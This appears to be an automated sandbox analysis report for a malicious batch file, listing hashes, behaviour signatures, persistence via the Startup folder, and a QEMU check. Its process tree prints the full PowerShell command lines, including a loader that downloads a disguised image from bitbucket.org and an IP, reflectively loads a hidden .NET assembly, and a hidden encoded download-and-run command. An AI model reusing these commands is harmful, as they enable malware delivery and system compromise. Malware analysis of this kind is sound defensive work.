Analysis

max time kernel: 117s
max time network: 123s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 17-12-2024 08:38
Static task: static1
Behavioral task: behavioral1
Sample: b4ca7ff5efd0278fef09daf595489560.bat
Resource: win7-20240903-en
General

Target: b4ca7ff5efd0278fef09daf595489560.bat
Size: 14KB
MD5: b4ca7ff5efd0278fef09daf595489560
SHA1: 112847b2bf3d344b10aae9d6bb375de51b0d3b7b
SHA256: 5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c
SHA512: 5e3933d702ecad73bdd81723bd2de7bfb919a10e768a2f1a7e2c90bdb02b6f6ee30a80a9233fe7ca3bc72efb3e7b1f20ff3a6bd05960e172d77bc928418b25b2
SSDEEP: 192:SLmONLs0foAt5SVQfFY3vJG5finGma/E0DlNwYaJQnY+1adnG7RQBaFovHSehrvb:/0foNGUvoLwzJQIdnG7R/EHZbGNpM
Malware Config

Signatures

Blocklisted process makes network request (2 IoCs)
flow  pid   Process
5     1976  powershell.exe
6     1976  powershell.exe

pid   Process
2424  powershell.exe
1976  powershell.exe
2860  powershell.exe

Drops startup file (2 IoCs)
description                   ioc                                                                                                              Process
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b4ca7ff5efd0278fef09daf595489560.bat  cmd.exe
File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b4ca7ff5efd0278fef09daf595489560.bat  cmd.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
flow  ioc
4     bitbucket.org
5     bitbucket.org
6     bitbucket.org

Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid   Process
2424  powershell.exe
1976  powershell.exe
2860  powershell.exe

Suspicious use of AdjustPrivilegeToken (43 IoCs)
description                          pid   Process
Token: SeIncreaseQuotaPrivilege      1800  WMIC.exe
Token: SeSecurityPrivilege           1800  WMIC.exe
Token: SeTakeOwnershipPrivilege      1800  WMIC.exe
Token: SeLoadDriverPrivilege         1800  WMIC.exe
Token: SeSystemProfilePrivilege      1800  WMIC.exe
Token: SeSystemtimePrivilege         1800  WMIC.exe
Token: SeProfSingleProcessPrivilege  1800  WMIC.exe
Token: SeIncBasePriorityPrivilege    1800  WMIC.exe
Token: SeCreatePagefilePrivilege     1800  WMIC.exe
Token: SeBackupPrivilege             1800  WMIC.exe
Token: SeRestorePrivilege            1800  WMIC.exe
Token: SeShutdownPrivilege           1800  WMIC.exe
Token: SeDebugPrivilege              1800  WMIC.exe
Token: SeSystemEnvironmentPrivilege  1800  WMIC.exe
Token: SeRemoteShutdownPrivilege     1800  WMIC.exe
Token: SeUndockPrivilege             1800  WMIC.exe
Token: SeManageVolumePrivilege       1800  WMIC.exe
Token: 33                            1800  WMIC.exe
Token: 34                            1800  WMIC.exe
Token: 35                            1800  WMIC.exe
Token: SeIncreaseQuotaPrivilege      1800  WMIC.exe
Token: SeSecurityPrivilege           1800  WMIC.exe
Token: SeTakeOwnershipPrivilege      1800  WMIC.exe
Token: SeLoadDriverPrivilege         1800  WMIC.exe
Token: SeSystemProfilePrivilege      1800  WMIC.exe
Token: SeSystemtimePrivilege         1800  WMIC.exe
Token: SeProfSingleProcessPrivilege  1800  WMIC.exe
Token: SeIncBasePriorityPrivilege    1800  WMIC.exe
Token: SeCreatePagefilePrivilege     1800  WMIC.exe
Token: SeBackupPrivilege             1800  WMIC.exe
Token: SeRestorePrivilege            1800  WMIC.exe
Token: SeShutdownPrivilege           1800  WMIC.exe
Token: SeDebugPrivilege              1800  WMIC.exe
Token: SeSystemEnvironmentPrivilege  1800  WMIC.exe
Token: SeRemoteShutdownPrivilege     1800  WMIC.exe
Token: SeUndockPrivilege             1800  WMIC.exe
Token: SeManageVolumePrivilege       1800  WMIC.exe
Token: 33                            1800  WMIC.exe
Token: 34                            1800  WMIC.exe
Token: 35                            1800  WMIC.exe
Token: SeDebugPrivilege              2424  powershell.exe
Token: SeDebugPrivilege              1976  powershell.exe
Token: SeDebugPrivilege              2860  powershell.exe

Suspicious use of WriteProcessMemory (15 IoCs)
description                          pid   Process         procid_target
PID 2324 wrote to memory of 1800     2324  cmd.exe         32
PID 2324 wrote to memory of 1800     2324  cmd.exe         32
PID 2324 wrote to memory of 1800     2324  cmd.exe         32
PID 2324 wrote to memory of 2484     2324  cmd.exe         33
PID 2324 wrote to memory of 2484     2324  cmd.exe         33
PID 2324 wrote to memory of 2484     2324  cmd.exe         33
PID 2324 wrote to memory of 2424     2324  cmd.exe         35
PID 2324 wrote to memory of 2424     2324  cmd.exe         35
PID 2324 wrote to memory of 2424     2324  cmd.exe         35
PID 2424 wrote to memory of 1976     2424  powershell.exe  36
PID 2424 wrote to memory of 1976     2424  powershell.exe  36
PID 2424 wrote to memory of 1976     2424  powershell.exe  36
PID 2324 wrote to memory of 2860     2324  cmd.exe         37
PID 2324 wrote to memory of 2860     2324  cmd.exe         37
PID 2324 wrote to memory of 2860     2324  cmd.exe         37
Processes

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\b4ca7ff5efd0278fef09daf595489560.bat"
  PID: 2324
  - Drops startup file
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    PID: 1800
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\find.exe
    find "QEMU"
    PID: 2484

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "$codigo = '[obfuscated base64 blob elided; the decoded script is the child powershell.exe command line]';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"
    PID: 2424
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.crcdkee/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"
      PID: 1976
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g
    PID: 2860
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 9e373063a702bda1f03a908e2b107bd0
SHA1: 72a172fb2b21e28486628688692fb5a9decc086b
SHA256: d74634a91008e985051e2179378627ad96dfc92e79d815d07940238741d58d68
SHA512: 332c968b8616d9e8596eefdc5199fe595a22dbf614cecb820481923c71afa296112d3106411e1fe47ac8e3883ebef8859cd9825497e0590cb7f53e305420b86e